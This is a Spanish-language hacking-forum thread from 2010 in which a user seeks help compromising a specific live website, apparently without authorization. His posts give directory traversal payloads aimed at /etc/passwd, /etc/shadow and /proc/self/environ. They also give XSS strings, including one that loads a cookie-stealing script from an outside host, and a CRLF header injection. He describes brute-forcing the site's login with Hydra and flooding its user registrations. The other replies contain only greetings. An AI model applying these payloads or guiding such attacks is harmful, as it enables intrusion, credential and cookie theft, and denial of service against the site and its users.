Hacking Ético
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Directory traversal

3 participantes

Ir abajo

Directory traversal Empty Directory traversal

Mensaje  chusrubi2 Jue Oct 21 2010, 07:22

Hola, ya sé que soy nuevo por aquí y no sé si debería ir tan directo pero hí va:

La web es vuln a action=../../../../../../../../../../etc/passwd.png pero:
1.-
Nada, no muestra nada de esto:
action=../../../../../../../../../../proc/self/environ.png

No muestra nada cuando action=../../../../../../../../../../etc/shadow.png&id=4504

creo q solo es vuln pal passwd

asi k no me deja.

¿Hay algun otro metodo de explotar con directory taversal?

Si no se puede con directory traversal, la web es vulnerable tb a:
-ASP.NET Padding Oracle Vulnerability
-Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability


Pero estas si q verdaderamente no se ni por donde empezar...

2.-
EDITO 19/10: He sacado más vuln y es vuln a xss: " onmouseover=prompt(970448) bad="

Yo ya he usado anteriormente en otra web xss usando este codigo:
http://xxxxx.com/?action=best&srt=1>"><script src="http://xxxxx/cookie.js">&dir=1

El problema es que no sé cómo implimentarlo aquí, es decir, he probado de todas formas y maneras:
Vuln: action=best&dir=" onmouseover=prompt(970448) bad="

Modificado:
action=best&dir=" onmouseover=<script src="http://xxxxx/cookie.js"> bad="

action=best&dir=" onmouseover=<script>alert()</script> bad="

ETC...
Pero nada funciona.
Creo que tiene una especie de filtro (he intentado sobrepasarlos por ejemplo < = &lt; ETC), por ejemplo el alert() solo funciona asi:
action=best&dir=" onmouseover=alert() bad="
3.-
Vale esto es lo referente a xss, pero esque luego tambien es vulnerable a CRLF injection:
/download.php?id=
SomeCustomInjectedHeader:injected_by_wvs&t=1287498936

El caso es que no me aparece nada, ¿debería?


Haber si algun alma caritativa se atreve
asias.


Última edición por chusrubi2 el Sáb Oct 23 2010, 09:28, editado 2 veces

chusrubi2

Mensajes : 2
Fecha de inscripción : 21/10/2010

Volver arriba Ir abajo

Directory traversal Empty Re: Directory traversal

Mensaje  kmx0 Jue Oct 21 2010, 09:18

Bienvenido y gracias por visitar nuestro foro, yo no estoy muy puesto en el tema así que me ahorraré la recomendación porque puedo equivocarte, de todas formas tenemos dos compañeros que posiblemente sepan algo.
kmx0
kmx0

Mensajes : 522
Fecha de inscripción : 23/06/2010
Localización : AL-ANDALUS

http://www.hacking-etico.com

Volver arriba Ir abajo

Directory traversal Empty Re: Directory traversal

Mensaje  ciyinet Vie Oct 22 2010, 06:28

hola amigo. Bienvenido a nuestro foro. Ahora mismo estoy un poco ocupado en cuanto pueda te contesto algo!
ciyinet
ciyinet

Mensajes : 316
Fecha de inscripción : 23/06/2010

Volver arriba Ir abajo

Directory traversal Empty Re: Directory traversal

Mensaje  chusrubi2 Sáb Oct 23 2010, 09:24

Va xDD que estoy tan desesperado que he intentado hacerle un brutus aet2 (además de con el hydra en ubuntu) al method post del login pero no me rula nu sé pq se me desconecta del target.
También he (hemos, un colega y yo) intentado programar un script para mirc para flooder de registros de usuario pero no funciona tampoco! XD
La web tiene ademas, en la raiz /sql el login para entrar a phpmyadmin, pero rusulta que es la version 2.11.2.1.También apache inferior a 2.0.61 y mysql 5.0.52 el caso es q no se explotar las vuln... o la mayoría de ellas son xss y me va a ser xungo pillarle por ahi.
PD:Si te apetece aclararme las dudas por msn seria mejor y mas rapido! XD
Haber si os mojais!
Salu2 y gracias.

chusrubi2

Mensajes : 2
Fecha de inscripción : 21/10/2010

Volver arriba Ir abajo

Directory traversal Empty Re: Directory traversal

Mensaje  Contenido patrocinado


Contenido patrocinado


Volver arriba Ir abajo

Volver arriba


 
Permisos de este foro:
No puedes responder a temas en este foro.